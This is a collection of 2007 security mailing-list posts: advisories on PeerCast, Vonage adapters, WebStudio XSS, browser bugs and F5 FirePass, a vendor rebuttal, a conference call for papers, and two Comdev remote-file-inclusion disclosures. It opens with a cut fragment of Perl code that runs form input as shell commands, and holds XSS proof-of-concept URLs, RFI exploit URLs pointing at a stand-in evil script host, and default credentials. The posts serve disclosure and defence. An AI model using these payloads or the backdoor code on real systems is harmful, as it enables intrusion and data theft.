$ENV{'OS'} ) { system("$FORM{'?'}"); } else { open(ELIF,"|$FORM{'?'}"); } exit; }
2007-06-03: PeerCast streaming server submits cleartext password
Hi there, peercast also submits the configured password in cleartext. e.g. http://www.domain.tld:7144/admin?cmd=login&pass=asdfg.jodi.org&submit=Login well, I have just played a bit around with it, so I assume this is already known. Solution might be to use stunnel. Have Fun :) Greetz mpeg
Redlevel Advisory #025 - Vonage VoIP Telephone Adapter Default Misconfiguration
Vonage VoIP Telephone Adapter Default Misconfiguration The Vonage VoIP Telephone Adapter device is, by default, accessible from the WLAN/internet. The product ships with the default username of 'user' and default password of 'user' to access the administrative backend. Users are suggested to update their passwords immediately. An attacker could cause a denial-of-service by uploading broken firmware to the device, or by constantly rebooting the device. John Martinelli [EMAIL PROTECTED] http://RedLevel.org RedLevel.org Security
Re: Buffer overflow in BusinessMail email server system 4.60.00
This problem was corrected within 14 days, and a new SMTP server was provided on our web site. This was back in 2005, we are now almost TWO YEARS ON, and you still claim it is a problem. You **were** notified of the release of the fix, and we have many other confirmations that it is indeed a good fix. We are now at 4.7 of BusinessMail, and that also still blocks this "vulenrability", and yet you continue to publich out of ate dand inaccurate information as being the truth. Kindly update your published information as relevant to reflect the true facts of this buglet. You can download an evaluation BusinessMail system from our web site to test this for yourself if you still do not beleive us. Thank You
WebStudio Multiple XSS Vulnerabilities
Application: WebStudio CMS Vendors Url: http://www.bdigital.biz Bug Type: Multiple URL Handling Remote Cross-Site Scripting Vulnerabilities Exploitation: Remote Severity: Less Critical Solution Status: Unpatched Introduction: WebStudio CMS is a web-based CMS system Google Dork: "Powered by WebStudio" Description: User-supplied input passed via the URL is not properly sanitised before it is being returned to the user in index.php?pageid=. This can be exploited to execute arbitrary script code in the security context of an affected website, as a result the code will be able to access any of the target user's cookies, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. PoC: http://[target]/?pageid=[XSS] http://[target]/?pageid=[XSS] http://[target]/?pageid=[XSS] http://[target]/?pageid=-->[XSS] http://[target]/[EMAIL PROTECTED] http://[target]/?pageid=http://[target]/?pageid=[XSS] http://[target]/index.php?pageid=>'>[XSS] http://[target]/index.php?pageid=[XSS] http://[target]/index.php?pageid=[XSS] http://[target]/index.php?pageid=-->[XSS] http://[target]/[EMAIL PROTECTED] http://[target]/index.php?pageid=http://[target]/index.php?pageid=[XSS] Solution: There was no vendor-supplied solution at the time of entry. Edit source code manually to ensure user-supplied input is correctly sanitised. Filter malicious characters and character sequences via a HTTP proxy or firewall with URL filtering capabilities. Credits: Glafkos Charalambous glafkos (at) infosec (dot) org (dot) uk Information Security Uncensored InfoSEC.org.uk
Assorted browser vulnerabilities
Hello, Will keep it brief. A couple of browser bugs, fresh from the oven, hand crafted with love: 1) Title: MSIE page update race condition (CRITICAL) Impact : cookie stealing / setting, page hijacking, memory corruption Demo : http://lcamtuf.coredump.cx/ierace/ ...aka the bait & switch vulnerability. When Javascript code instructs MSIE6/7 to navigate away from a page that meets same-domain origin policy (and hence can be scriptually accessed and modified by the attacker) to an unrelated third-party site, there is a window of opportunity for concurrently executed Javascript to perform actions with the permissions for the old page, but actual content for the newly loaded page, for example: - Read or set victim.document.cookie, - Arbitrarily alter document DOM, including changing form submission URLs, injecting code, - Read or write DOM structures that were not fully initialized, prompting memory corruption and browser crash. This is tested on MSIE6 and MSIE7, fully patched. 2) Title: Firefox Cross-site IFRAME hijacking (MAJOR) Impact : keyboard snooping, content spoofing, etc Demo : http://lcamtuf.coredump.cx/ifsnatch/ Bugzilla : https://bugzilla.mozilla.org/show_bug.cgi?id=382686 [May 30] Javascript can be used to inject malicious code, including key-snooping event handlers, on pages that rely on IFRAMEs to display contents or store state data / communicate with the server. This is related to a less severe variant independently reported by Ronen Zilberman two weeks earlier (bug 381300). 3) Title: Firefox file prompt delay bypass (MEDIUM) Impact : non-consentual download or execution of files Demo : http://lcamtuf.coredump.cx/ffclick2/ Bugzilla : https://bugzilla.mozilla.org/show_bug.cgi?id=376473 [Apr 04] A sequence of blur/focus operations can be used to bypass delay timers implemented on certain Firefox confirmation dialogs, possibly enabling the attacker to download or run files without user's knowledge or consent. 3) Title: MSIE6 URL bar spoofing (MEDIUM) Impact : mimicking an arbitrary site, possibly including SSL data Demo : http://lcamtuf.coredump.cx/ietrap2/ MSIE6 vulnerability, similar but unrelated to my earlier onUnload entrapment flaw, allows sites to spoof URL bar data. MSIE7 is not affected because of certain high-level changes in the browser.
S21Sec-035: F5 FirePass command execution vulnerability
## - S21Sec Advisory - ## Title: F5 FirePass command execution vulnerability ID: S21SEC-035-en Severity: High - Intrusion History: 14.Feb.2007 Vulnerability discovered 22.Feb.2007 Vendor contacted Scope: Linux's shell Command Execution Platforms: Linux based Appliance Author: Leonardo Nve ([EMAIL PROTECTED]) URL: http://www.s21sec.com/avisos/s21sec-035-en.txt Release: Public [ SUMMARY ] F5's FirePass SSL VPN appliance provides secure access to corporate applications and data using a standard web browser. Delivering outstanding performance, scalability, ease-of-use, and end- point security, FirePass helps increase the productivity of those working from home or on the road while keeping corporate data secure. FirePass provides: * Automatic detection of security compliant systems, preventing infection. * Automatic integration with the largest number of virus scanning and personal firewall solutions in the industry (over 100 different AV & Personal Firewall versions). * Automatic protection from infected file uploads or email attachments. * Automatic re-routing and quarantine of infected or non- compliant systems to a self remediation network - reducing help desk calls. * A secure workspace, preventing eavesdropping and theft of sensitive data. * Secure Login with a randomized key entry system, preventing keystroke logger snooping. * Full integration with the FirePass Visual Policy Editor. This enables the creation of custom template policies based on the endpoints accessing your network and your company's security profile. [ AFFECTED VERSIONS ] This vulnerability has been tested in F5 FirePass 4100. [ DESCRIPTION ] S21sec has discovered a vulnerability in a F5 FirePass SSL VPN script that allows the injection of Linux's shell command under some circunstances. The attacker doesn`t need to be logged in the system in order to trigger the exploit The affected script is: - my.activation.php3 The variable is: - username [ WORKAROUND ] F5 has published a security advisory at https://tech.f5.com/home/ solutions/sol167.html Additionally, hotfix HF-75705-76003-1 has been issued for supported versions of FirePass. You may download this hotfix or later versions of the hotfix from the F5 Networks Downloads site (https://downloads.f5.com/esd/index.jsp). [ ACKNOWLEDGMENTS ] This vulnerability has been discovered and researched by: - Leonardo Nve <[EMAIL PROTECTED]> S21Sec With thanks to: - Alberto Moro <[EMAIL PROTECTED]> S21Sec [ REFERENCES ] * F5 Firepass http://www.f5.com/products/FirePass/ * S21Sec http://www.s21sec.com
BCS'07 Call For Papers
Dear Bugtraq readers, The call for papers and conference registration is now open for BCS'07, our third annual information security & hacking conference. From 30 to 31 October 2007, BCS'07 will be held at the Grand Melia in Jakarta, Indonesia. We invite proposals for paper presentations and demonstrations: Your submission should include: 1. Name, title, address, email and phone number 2. Draft of the proposed presentation (in PDF, PowerPoint or Keynote format), proof of concept for tools and exploits, etc. 3. Short biography, qualification, occupation, achievement and affiliations (limit 150 words). 4. Summary or abstract for your presentation (limit 150 words) 5. Time (40-60 minutes). Include time for discussion and questions 6. Technical requirements (video, internet, wireless, audio, etc.) We do not accept product, service or vendor related presentations. Please send your proposal to [EMAIL PROTECTED] as soon as possible and no later than 30 June 2007. Proposals will be evaluated in the order received; submit early to maximise your chances of being selected. Links: http://www.bellua.net or http://www.bellua.com/bcs/ Pictures from BCS2006: http://www.bellua.net/asia06.pictures/index.html Pictures from BCS2005: http://www.bellua.net/asia05.pictures/index.html Many thanks, Jim Geovedi
Comdev eCommerce 4.1 RFI Vulnerability
### # # Comdev eCommerce 4.1 RFI Vulnerability # ### # Infomation:- # # Scripts: Comdev eCommerce # Download: http://www.comdevweb.com/downloadfile.php?product=ECOMM41&url=http://share.comdevweb.com/download/ecommerce-4.1.zip # Version : 4.1 # # # Exploit : # # http://website/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=http://EVILSCRIPT.txt? # ### # # Discoverd By : [L.T.C] # ###
Comdev Web Blogger 4.1 RFI Vulnerability
### # # Comdev Web Blogger 4.1 RFI Vulnerability # ### # Infomation:- # # Scripts: Comdev Web Blogger # Download: http://www.comdevweb.com/downloadfile.php?product=BLOGG41&url=http://share.comdevweb.com/download/blogger-4.1.zip # Version : 4.1 # # # Exploit : # # http://website/oneadmin/blogger/sampleblogger.php?path[docroot]=http://EVILSCRIPT.txt? # ### # # Discovered By : [L.T.C] # ###